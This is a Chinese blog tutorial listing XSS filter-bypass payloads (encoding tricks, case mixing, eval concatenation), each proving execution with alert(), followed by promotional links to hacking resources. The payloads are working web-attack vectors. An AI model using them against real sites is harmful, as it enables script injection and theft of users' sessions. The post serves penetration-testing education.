XSS绕过姿势(非常详细)零基础入门到精通,收藏这一篇就够了

于 2025-05-21 15:59:27 发布
阅读量586 收藏 10
点赞数 18
分类专栏: 程序员 编程 计算机工具 文章标签: xss 前端 linux 服务器 运维 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/logic1001/article/details/148118381
版权

以下姿势都是笔者在实战中经历过的,并且记录下来,时间可能比较久远具体的payload在实战中不一定能触发,但是绕过的思路还是以此基础进行改进的,这里笔者将一些payload在这里分享给各位师傅

绕过空格过滤

用 / 代替空格

<img/src="x"/onerror=alert(1);>``<img/src="x"onerror=alert(1);>

绕过引号过滤

在html标签中可以不用引号,在js中可以用反引号代替

<img src=x onerror=alert(`xss`);>

绕过括号过滤

throw语句绕过

<img src=x onerror="javascript:window.onerror=alert;throw 1">``<a onmouseover="javascript:window.onerror=alert;throw 1>

绕过关键字过滤

大小写绕过
<sCRiPt>alert(1);</sCrIpT>``<ImG sRc=x onerRor=alert(1);>

双写绕过

<scrscriptipt>alert(1);</scrscriptipt>``<imimgg srsrcc=x onerror=alert(1);>

字符串拼接绕过

利用eval()函数

<img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)">```<img src="x"onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">  // 在js中,我们可以用反引号代替单双引号`

利用top

<script>top["al"+"ert"](`xss`);</script>

字符编码绕过

HTML实体编码

通过xss黑魔法svg

<svg><script>alert("xss")</script>``<svg><script>alert(1)</script>``<svg><script>alert(1)</script>

URL编码

<a href=javascript:alert("xss")>test</a>``<a href=javascript:%61%6c%65%72%74%28%22%78%73%73%22%29>test</a>``   ``<iframe src=javascript:alert("xss")></iframe>``<iframe src="javascript:%61%6c%65%72%74%28%22%78%73%73%22%29"></iframe>

JavaScript编码

Unicode编码

<script>alert("xss")</script>``<script>\u0061\u006C\u0065\u0072\u0074("xss")</script>``<script>\u0061\u006C\u0065\u0072\u0074("\u0078\u0073\u0073")</script>`  `<a href=javascript:alert("xss")>test</a>``<a href=javascript:\u0061\u006C\u0065\u0072\u0074("xss")>test</a>``<a href=javascript:\u0061\u006C\u0065\u0072\u0074("\u0078\u0073\u0073")>test</a>

混合编码

<a href=javascript:alert("xss")>test</a>``   ``// 对javascript:进行HTML编码, 对alert("xss")进行URL编码``<a href=javascript:%61%6c%65%72%74%28%22%78%73%73%22%29>test</a>``// 对javascript:进行HTML编码, 对alert进行Unicode编码``<a href=javascript:\u0061\u006C\u0065\u0072\u0074("xss")>test</a>``   ``// 对\u0061\u006c\u0065\u0072\u0074 进行URL编码``<a href=javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34("xss")>test</a>

tips:

<div id='s'>test</div>` `   ``<script>    ``   var search = "...";     ``  document.getElementById('s').innerHTML = search;``</script>

遇见该模板时,此时如果过滤了 <、>、'、"、&、% 等等这些字符的话,我们便可以用JavaScript编码的方法将XSS向量全部编码,即 的以下编码都可以弹窗:

// Unicode编码``\u003C\u0069\u0066\u0072\u0061\u006D\u0065\u0020\u0073\u0072\u0063\u003D\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0078\u0073\u0073\u0027\u0029\u003E\u003C\u002F\u0069\u0066\u0072\u0061\u006D\u0065\u003E``   ``// 八进制编码``\74\151\146\162\141\155\145\40\163\162\143\75\152\141\166\141\163\143\162\151\160\164\72\141\154\145\162\164\50\47\170\163\163\47\51\76\74\57\151\146\162\141\155\145\76`    `   ``// 十六进制编码``\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e

还有一种让八进制和十六进制编码的XSS攻击向量执行的方式便是将XSS向量放在某个能把字符串当做JavaScript代码来执行的函数里,比如eval()、setTimeout()、setInterval()等函数。如下示例:

•<script>alert("xss")</script>`  `<script>eval("\141\154\145\162\164\50\42\170\163\163\42\51")</script>``   ``•<a href=javascript:alert("xss")>test</a>`  `<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73\x22\x29")>test</a>``   ``•<img src=x onerror=alert("xss")>`  `<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。

XSS攻击绕过方法以及绕过waf方法语句大全 XSS攻击语句这一篇
浩策盾悟
12-31 1万+
1. 使用HTML实体编码 2. 大小写混合 3. 利用JavaScript事件 4. 利用URL编码 5. 使用不完整的HTML标签 6. 利用编码绕过 7. 使用不寻常的标签 8. 利用CDATA 9. 利用注释 10. 使用文档对象模型(DOM) 11. 利用HTML5功能 12. 使用特殊字符 13. 利用外部脚本 14. 使用IFrame 15. 利用CSS注入 16. 使用数据URI 17. 利用SVG 18. 使用Base64编码 19. 利用JavaScr
【网络安全】基础知识详解(非常详细零基础入门精通
2301_77160226的博客
09-11 2233
网络安全是一个充满挑战和机遇的领域,随着数字化时代的发展,网络安全的重要性日益凸显。通过系统的学习和实践,掌握网络安全的基础知识和技能,不断提升自己的能力,你可以在这个领域中取得成功。同时,要保持对网络安全的热情和好奇心,持续学习和关注行业动态,为保护网络空间的安全贡献自己的力量。
网络安全培训指南(非常详细),网络安全零基础入门精通收藏这篇就
Python_paipai的博客
10-25 930
从网络安全专业学习的主要内容来看,包括linux运维、Python开发、渗透测试、代码审计、等级保护、应急响应、风险评估等。①就业环境:网络安全可以在计算机科学与技术、信息通信、电子商务、互联网金融、电子政务等领域从事相关工作,还可以在政府机关事业单位、银行、保险、证券等金融机构,电信、传媒等行业从事相关工作。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
Saltstack入门教程:全面了解Saltstack基础,零基础入门精通收藏一篇
Python_paipai的博客
12-03 872
Saltstack(简称Salt)是一个强大的自动化运维框架,广泛应用于配置管理、远程执行、云管理等领域。它基于Python开发,具有高效、灵活、易扩展的特点。Saltstack是一个功能强大的自动化运维工具,通过本文的介绍,相信你已经对Saltstack有了初步的了解。接下来,你可以进一步学习Saltstack的高级功能,如Pillar、Grains、Beacons等,以提升你的自动化运维能力。黑客/网络安全学习路线。
新手漏洞挖掘经验分享(非常详细零基础入门精通收藏一篇
HUANGXIN9898的博客
03-25 1165
开始之前做个自我介绍,我是来自F0tsec团队的Subs,也是刚接触安全没有多久的菜狗,刚趁着安全客推荐的平台活动,尝试了三天漏洞挖掘,我运气挺好的(挖到了四个低危,2个中危,一个严重漏洞),也因此结实了SRC年度榜一榜二的几位大师傅,得到了一些心得吧,希望能帮助到一些和我一样入门的朋友。(互相交流哈~ )这篇文章可能没有像别的大师傅写出来很炫酷的姿势,希望对和我一样的新入门的朋友能产生一些激励,带来新的思路,因为交src总有被忽略的时候,不要灰心丧气,年轻的程序员从来不缺重头再来的勇气!加油!!
Puppet编程入门:详解Puppet安装步骤,零基础入门精通收藏这篇就
Python_paipai的博客
12-03 964
通过本文的详细讲解,相信您已经掌握了Puppet的安装方法。接下来,您可以进一步学习Puppet的配置和使用,提升您的DevOps技能。
IT技术人员转行网络安全怎么样?零基础入门精通收藏一篇
Python_paipai的博客
12-03 1163
根据不同的安全技术方向、应用场景、技术实现等,网络安全可以有很多分类方法,简单可以分为网络安全Web安全、云安全、移动安全(手机)、桌面安全(电脑)、主机安全服务器)、工控安全、无线安全、数据安全等不同领域。网络安全人才从事的岗位种类繁多,主要是研发与测试、安全服务、销售、售前、售后、安全管理、产品经理、安全分析、市场营销、CIO/CSO等职位。初级渗透测试工程师,网络情报分析员,渗透测试工程师,安全运维工程师,等保人员,安全应急响应人员,安全开发人员,企业SRC人员。现在,越来越多单位为了满足。
Linux 磁盘打爆了,如何排查?零基础入门精通收藏一篇
Python_paipai的博客
12-12 1206
登录服务器,通过df -Hl查看:和告警信息一致,接着我们就是要找到导致磁盘空间满的目录或文件。
了解网络安全(黑灰产)黑话,零基础入门精通收藏这篇就
Python_paipai的博客
11-25 1445
我接触黑话大概有两个用途:1、黑灰产情报解读:公司体量也不小经常被薅羊毛,SRC开放了情报提供积分,所以对于白帽子提供的情报,通过掌握的黑话去了解情况。又称网赚平台,是指利用低廉的佣金吸引闲暇时间比较多的人群来帮忙人肉翻译验证码,然后把翻译好的文本回传给脚本,连同撞库的用户名、密码再尝试登录。解决客户的需求短时间内将大量快手用户引向其他平台,对引流人数和引向的平台设置不同的门槛,抽取佣金。将批量注册的小号,不断发作品,关注用户,修改头像,主要目的是为了降低账号被封的概率。
如何成为一名网络安全工程师?网络安全零基础入门精通收藏一篇
Python_paipai的博客
12-09 965
从事网络安全工程师的职业生涯是网络安全领域的一条充满挑战和回报的道路。在本文中,您将了解网络安全工程师的具体工作、要遵循的教育途径、所需的关键技能和认证以及职业前景。利用我们在网络安全培训方面的深厚专业知识,我们提供实用且高度相关的见解。无论您是初学者还是希望进一步发展,本指南都将为您提供知识,以驾驭不断发展的网络安全格局并促进您的专业成长。
CTF中Web题目的常见题型及解题姿势零基础入门精通收藏这篇就
小司机的奥拓
10-10 1375
考察基本的查看网页源代码、HTTP请求、修改页面元素等。这些题很简单,比较难的比赛应该不会单独出,就算有应该也是Web的签到题。实际做题的时候基本都是和其他更复杂的知识结合起来出现。按F12就都看到了,flag一般都在注释里,有时候注释里也会有一条hint或者是对解题有用的信息。可以用hackbar,有的也可以写脚本。Bugku web基础$_GET: http://123.206.87.240:8002/get/
多模态大模型入门指南(非常详细零基础入门精通收藏一篇
Hacker_doggy的博客
07-17 3279
如表1所示,对26 SOTA MM-LLMs的架构和训练数据集规模进行了全面比较。随后,简要介绍这些模型的核心贡献并总结了它们的发展趋势。代表了一系列视觉语言 (VL) 模型,旨在处理交错的视觉数据和文本,生成自由格式的文本作为输出。(2)BLIP-2引入了一个资源效率更高的框架,包括用于弥补模态差距的轻量级 Q-Former ,实现对冻结 LLMs 的充分利用。利用 LLMs,BLIP-2 可以使用自然语言提示进行零样本图像到文本的生成。(3)LLaVA。
SQL注入绕过安全狗的waf防火墙,这一篇了,8k文案超详细
xt350488的博客
07-16 5417
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
xss绕过html实体化,通过脚本片段绕过XSS防御
weixin_42386511的博客
06-07 1899
原标题:通过脚本片段绕过XSS防御 从恶作剧弹框到盲打后台乃至沦陷一个企业,XSS的危害可大可小,近年来,XSS攻击与防御的博弈持续不断,下面是今年5月份北爱尔兰首府举行的OWASP AppSec EU的安全议题:通过脚本片段绕过XSS防御。一、XSS 防御措施尽管业界付出了很多努力,XSS依然是一个广泛且未解决的问题。有数据指出:谷歌VRP中70%的漏洞是XSS漏洞。XSS防御技术的通用假设为:...
DVWA-XSS
最新发布
2301_80753596的博客
05-21 219
这是一个下拉框的形式,但是如果我们不让他等于English呢,换成js代码呢?
Cross-Site Scripting(XSS
2401_88816569的博客
05-16 972
本文讲解了xss的基本方式,文章通俗易懂,适合初学者学习理解,主要着重于xss反射性的讲解,并附带靶场实操,理论与实践相结合。
关于 Web 漏洞原理与利用:2. XSS(跨站脚本攻击)
Triste__chengxi的博客
05-19 889
元素内容用户输入攻击者可以控制的内容未过滤没有进行转义、校验、过滤被执行浏览器把它当代码运行了原理核心:数据变代码,浏览器帮攻击者执行了它。项目内容类型反射型 XSS(Reflected XSS)攻击入口URL 参数存储位置不存储,实时反射执行时机用户点击链接后立即危害弹窗、盗 Cookie、钓鱼、跳转恶意站防御输出编码 + 参数校验 + CSP反射型 XSS 就是攻击者把恶意脚本写到 URL 中,服务器没有过滤就原样返回,浏览器直接执行了它。项目内容类型。
【C# 自动化测试】Selenium显式等待机制详解
长期关注AI发展路径、技术价值转化与系统性落地。
05-20 453
Selenium中的显式等待机制是自动化测试中处理页面元素加载延迟的重要工具。与强制等待(如Thread.Sleep())相比,显式等待更加灵活高效,能动态检测元素状态,避免不必要的等待时间。显式等待通过WebDriverWait类实现,允许设置超时时间和轮询间隔,并可以忽略常见的异常类型,如NoSuchElementException。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值